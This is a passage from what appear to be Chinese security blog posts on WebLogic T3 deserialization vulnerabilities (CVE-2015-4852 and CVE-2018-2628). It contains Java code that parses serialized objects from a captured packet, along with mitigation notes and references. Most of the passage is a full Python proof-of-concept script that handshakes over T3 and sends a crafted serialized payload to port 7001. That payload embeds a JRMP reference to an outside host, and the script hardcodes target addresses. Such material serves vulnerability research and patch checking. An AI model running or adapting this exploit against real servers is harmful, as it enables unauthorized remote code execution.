                (byte) 0x2e, (byte) 0x72, (byte) 0x6a, (byte) 0x76, (byte) 0x6d, (byte) 0x2e, (byte) 0x4a, (byte) 0x56,
                (byte) 0x4d, (byte) 0x49, (byte) 0x44, (byte) 0xdc, (byte) 0x49, (byte) 0xc2, (byte) 0x3e, (byte) 0xde,
                (byte) 0x12, (byte) 0x1e, (byte) 0x2a, (byte) 0x0c, (byte) 0x00, (byte) 0x00, (byte) 0x78, (byte) 0x70,
                (byte) 0x77, (byte) 0x1f, (byte) 0x01, (byte) 0xb1, (byte) 0x5f, (byte) 0x44, (byte) 0x41, (byte) 0xe4,
                (byte) 0x9c, (byte) 0x92, (byte) 0x69, (byte) 0x00, (byte) 0x0c, (byte) 0x31, (byte) 0x37, (byte) 0x32,
                (byte) 0x2e, (byte) 0x31, (byte) 0x36, (byte) 0x2e, (byte) 0x32, (byte) 0x2e, (byte) 0x31, (byte) 0x32,
                (byte) 0x39, (byte) 0x36, (byte) 0x65, (byte) 0x53, (byte) 0x70, (byte) 0x00, (byte) 0x00, (byte) 0x00,
                (byte) 0x00, (byte) 0x78};
        int skip = 0;
        List<Integer> size_list = new ArrayList<Integer>();
        size_list.add(0);
        // 前四个字节
        int length = ((bytes[0] & 0xff) << 8 * 3) + ((bytes[1] & 0xff) << 8 * 2) + ((bytes[2] & 0xff) << 8) + (bytes[3] & 0xff);
        System.out.println("数据包长度标记:" + length);
        ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
        int origSize = bis.available();
        System.out.println("数据长度" + origSize);
        Object o = null;
        while (bis.available() > 0) {
            try {
                bis.reset();
                bis.skip(skip);
                ObjectInputStream ois = new ObjectInputStream(bis);
                o = ois.readObject();
                System.out.println("Object found:" + o.getClass().getName());
                size_list.add(skip);
                skip = origSize - bis.available();
            } catch (StreamCorruptedException e) {
                skip = skip + 1;
                bis.skip(1);
            } catch (OptionalDataException ode) {
                bis.skip(1);
                skip = skip + 1;
            } catch (ClassNotFoundException c) {
                System.out.println("Class not found:" + c.getMessage());
                skip = origSize - bis.available();
            }
        }
        size_list.add(bytes.length);
        int start = 0;
        int end = 0;
        for (int i = 0; i < size_list.size() - 1; i++) {
            start = size_list.get(i);
            end = size_list.get(i + 1);
            System.out.println("size:" + i + "  start:" + start + "  end:" + end);
        }
    }
}

可以看到，一共分为6段，第一部分没有序列化对象，2-6部分均存在序列化对象，这里借乌云一张图来解释。

因为第一部分会校验数据包长度，替换2-6部分的序列化数据不太现实，如果长度不匹配weblogic会报java.io.EOFException异常。

那么我们可以通过构造第一部分的非Java数据(前4个字节为数据长度)+第二部分拼接我们恶意的序列化数据，即可触发漏洞。

修复

1. 在weblogic所在服务器安装web代理应用，如apache、nginx等，使web代理监听原有的weblogic监听端口，并将HTTP请求转发给本机的weblogic，t3协议过不来自然无法触发反序列化。需要将weblogic停止脚本中的ADMIN_URL参数中的IP修改为“127.0.0.1”或“localhost”，否则停止脚本将不可用。
2. 使用https://github.com/ikkisoft/SerialKiller。
3. weblogic 用黑名单的方式对反序列化的类做了一些过滤，后面的几个 cve 也都是绕过黑名单。

总结

因为是common-collections这个库出现的反序列化漏洞，加上7001端口默认提供了http snmp t3协议服务，一个端口复用多个协议，而t3协议通过传续序列化对象来通信，对传输的数据又没有过滤，导致了反序列化漏洞，是反序列化影响范围大、影响时间久远的洞了。

本文花费的时间也比较长，从基本的common-collections链到weblogic的安装部署，再到wireshark分析和t3协议的模拟，参考了很多文章，毕竟刚开始学Java审计，慢慢来，加油。

参考链接

http://www.jspxcms.com/knowledge/429.html
https://blog.csdn.net/cz596738622/article/details/80483812
https://www.cnblogs.com/ph4nt0mer/p/11772709.html
https://paper.seebug.org/584/
https://paper.seebug.org/1012/
http://d1iv3.me/2018/06/05/CVE-2015-4852-Weblogic-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E5%88%86%E6%9E%90/
https://github.com/QAX-A-Team/WeblogicEnvironment
http://drops.xmd5.com/static/drops/web-13470.html
https://blog.csdn.net/he_and/article/details/97924679

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

http://www.lengbaikai.net/?p=250

今早，朋友圈就刷爆了这个漏洞，但是目前只有POC验证脚本放出，后续有exp放出时，我会继续更新这篇博文。

0x01 综述

当地时间4月17日，北京时间4月18日凌晨，Oracle官方发布了4月份的关键补丁更新CPU（Critical Patch Update）,其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628)，这个漏洞是我在去年11月份报给Oracle的，通过该漏洞，攻击者可以在未授权的情况下远程执行任意代码。

参考链接：

http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

漏洞影响范围

Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3

0x02 复现

目前流传比较广的是weblogic_poc.client1.for.scan-cve-2018-2628.py这个验证脚本，我们来开一个weblogic玩玩~

OK打开正常，这里的版本是12c

#!env python
#coding=utf-8
#
# Author:       liaoxinxi@nsfocus.com
#
# Created Time: Wed 19 Jul 2017 01:47:53 AM CST
#
# FileName:     weblogic_poc.py
#
# Description:
#
# ChangeLog:
# -*- coding: utf-8 -*-
import socket
import time
import re
VUL=['CVE-2018-2628']
PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print 'handshake successful'
def buildT3RequestObject(sock,port):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
    else:
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    print 'rs',rs
    checkVul(rs,server_addr,index)
if __name__=="__main__":
    dip = '218.1.102.99'
    dip = '10.65.46.125'
    dip = '192.168.3.216'
    dport = 7001
    run(dip,dport,0)
#    for i in range(0,len(VUL)):
#        run(dip,dport,i)

这里只是验证存在漏洞，我会持续关注，待能执行命令的exp放出来之后我会接着更新。